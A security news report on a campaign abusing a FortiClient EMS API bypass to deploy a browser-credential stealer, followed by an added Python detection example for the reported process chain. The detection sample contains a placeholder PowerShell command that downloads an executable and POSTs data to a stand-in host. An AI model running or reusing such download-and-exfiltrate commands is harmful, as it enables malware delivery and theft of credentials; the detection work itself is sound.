Threat actors are actively exploiting a critical security flaw affecting FortiClient Endpoint Management Server (EMS) deployments to distribute credential-stealing malware across managed systems, according to cybersecurity researchers. Security firm Arctic Wolf reported observing the malicious activity during May 2026, warning that attackers abused trusted endpoint management infrastructure to deliver malware disguised as legitimate Fortinet software updates. The campaign exploited a now-patched vulnerability identified as CVE-2026-35616, a critical pre-authentication API access bypass that could lead to privilege escalation. Fortinet addressed the issue in FortiClient EMS version 7.4.7 and later, but researchers caution that organizations running unpatched environments remain exposed to compromise.
According to Arctic Wolf, attackers used the vulnerability to gain unauthorized privileged access within FortiClient EMS and modify management configurations that affected all connected endpoint devices. Following successful exploitation, threat actors reportedly altered system settings to postpone firmware update notifications and modified Remote Access Profile configurations and endpoint policies to insert malicious scripts for execution on managed systems. Researchers stated that attackers leveraged FortiClient’s legitimate management mechanisms to distribute malicious PowerShell commands in a manner that closely resembled normal administrative activity. Because the endpoint management server acts as a centralized control system, attackers were able to expand their reach to all managed devices without needing separate intrusion paths for each endpoint, increasing the scale and impact of the operation.
The attack chain involved the abuse of a legitimate FortiClient executable known as fortitray.exe, which was used to launch a malicious command script through cmd.exe. Researchers explained that the script executed a Base64-encoded PowerShell command designed to download and run an executable named FortiEndpoint_Patch.exe while also transmitting stolen information to an external server through an HTTP POST request. The payload masqueraded as a Fortinet endpoint update but functioned as a previously undocumented Windows information stealer capable of harvesting sensitive browser data. Arctic Wolf found that the malware targeted passwords, session cookies, and autofill information, including payment card details, addresses, and phone numbers stored within Chromium-based and Gecko-based browsers. Collected information was written to a log file in the ProgramData directory before being prepared for exfiltration by the PowerShell component of the attack.
Researchers noted that while the information stealer itself lacked built-in network communication features, the surrounding PowerShell script handled data transmission to attacker-controlled infrastructure, specifically an external IP address linked to the operation. Arctic Wolf stated that by bypassing API authentication and operating within a privileged EMS environment, attackers gained the ability to manipulate trusted management functions and silently push malicious commands to connected systems. Security experts warned that stolen session cookies and browser credentials may allow attackers to gain unauthorized access to cloud services, enterprise applications, and internal systems, potentially bypassing multi-factor authentication protections through session reuse. The findings highlight the growing risks associated with attacks targeting centralized management platforms, where a single exploited vulnerability can provide access to large numbers of connected endpoints if security updates and monitoring controls are delayed.
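As an added detection example (not code from Arctic Wolf or this article), the Python below walks constructed process-creation events for the fortitray.exe -> cmd.exe -> encoded PowerShell chain described above, decodes the -EncodedCommand argument and checks it for the download and POST indicators the report mentions. The event field names, the file paths, the .invalid host and the placeholder script are all assumptions made for the sample data.

```python
import base64
import re
# The encoded-command switch with its Base64 (UTF-16LE) argument, and indicator strings from the reported chain.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
INDICATORS = ("FortiEndpoint_Patch.exe", "Invoke-WebRequest", "-Method Post", "ProgramData")

def encode_ps(script):
    """Build an -EncodedCommand argument; used here only to construct sample events."""
    return base64.b64encode(script.encode("utf-16le")).decode()

def decode_encoded_command(cmdline):
    """Return the decoded script when the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):  # malformed Base64 or odd-length UTF-16
        return None

def ancestry(pid, by_pid):
    """Lower-cased image basenames from the process up to its oldest known ancestor."""
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["image"].rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid]["ppid"]
    return chain

def find_suspicious_chains(events):
    """Flag powershell under fortitray.exe -> cmd.exe whose encoded script carries the indicators."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        chain = ancestry(e["pid"], by_pid)
        if chain[0] != "powershell.exe" or "cmd.exe" not in chain or "fortitray.exe" not in chain:
            continue
        script = (decode_encoded_command(e["cmdline"]) or "").lower()
        hits = [i for i in INDICATORS if i.lower() in script]
        if hits:
            findings.append({"pid": e["pid"], "chain": " -> ".join(reversed(chain)), "indicators": hits})
    return findings
# Constructed sample events (not real telemetry); the placeholder script only mirrors the reported download-then-POST shape.
BAD_SCRIPT = ("Invoke-WebRequest http://placeholder.invalid/FortiEndpoint_Patch.exe -OutFile "
              "$env:ProgramData\\FortiEndpoint_Patch.exe; Invoke-RestMethod -Method Post -Uri http://placeholder.invalid/")
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 10, "ppid": 1, "image": "C:\\Program Files\\Fortinet\\FortiClient\\FortiTray.exe", "cmdline": "FortiTray.exe"},
    {"pid": 11, "ppid": 10, "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c update.cmd"},
    {"pid": 12, "ppid": 11, "image": PS, "cmdline": "powershell.exe -NoProfile -EncodedCommand " + encode_ps(BAD_SCRIPT)},
    {"pid": 20, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},  # benign control chain
    {"pid": 21, "ppid": 20, "image": PS, "cmdline": "powershell.exe -EncodedCommand " + encode_ps("Get-Service | Out-File $env:ProgramData\\svc.txt")},
]
```

The benign explorer.exe chain carries an encoded script that touches ProgramData but is not flagged, because the parent-process check is what ties the alert to the FortiClient delivery path rather than to encoded PowerShell in general.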